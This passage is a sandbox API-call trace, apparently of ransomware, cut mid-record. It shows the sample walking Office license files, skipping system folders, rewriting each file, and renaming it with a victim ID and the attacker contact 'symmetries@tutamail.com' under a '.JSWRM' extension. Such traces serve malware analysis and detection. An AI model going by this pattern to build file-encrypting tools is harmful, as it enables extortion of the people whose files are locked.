office\\root\\licenses16\\personalpipcr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0106.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0106.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0106.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.787] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7fc9fe7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7fc9fe7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8193c39, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalPipcR_Grace-ul-oob.xrm-ms", cAlternateFileName="PERSON~3.XRM")) returned 1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.787] lstrcmpiW (lpString1="PersonalPipcR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0106.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0106.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0106.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0106.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0106.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0106.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0106.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0106.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0106.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.788] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0106.788] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0106.788] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0106.790] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.790] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0106.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.791] CloseHandle (hObject=0x45c) returned 1 [0106.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0106.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0106.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0106.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0106.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0106.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0106.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0106.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0106.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.793] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe806293d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe806293d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8121516, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalPipcR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PERSON~4.XRM")) returned 1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.793] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.794] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.794] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0106.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0106.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0106.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0106.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0106.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0106.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0106.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0106.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.794] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10663) returned 1 [0106.794] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0106.795] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0106.797] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.797] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0106.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.797] CloseHandle (hObject=0x45c) returned 1 [0106.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0106.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0106.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0106.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0106.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0106.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0106.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.797] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0106.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0106.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.815] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7f0b423, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7f0b423, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7fc9fe7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51d2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalPipcR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PERSON~2.XRM")) returned 1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.815] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0106.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0106.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0106.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0106.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0106.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0106.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.817] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20946) returned 1 [0106.817] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51d0) returned 0x24c1d0 [0106.817] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51d0, lpOverlapped=0x0) returned 1 [0106.820] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.820] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51d0, lpOverlapped=0x0) returned 1 [0106.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.820] CloseHandle (hObject=0x45c) returned 1 [0106.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0106.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 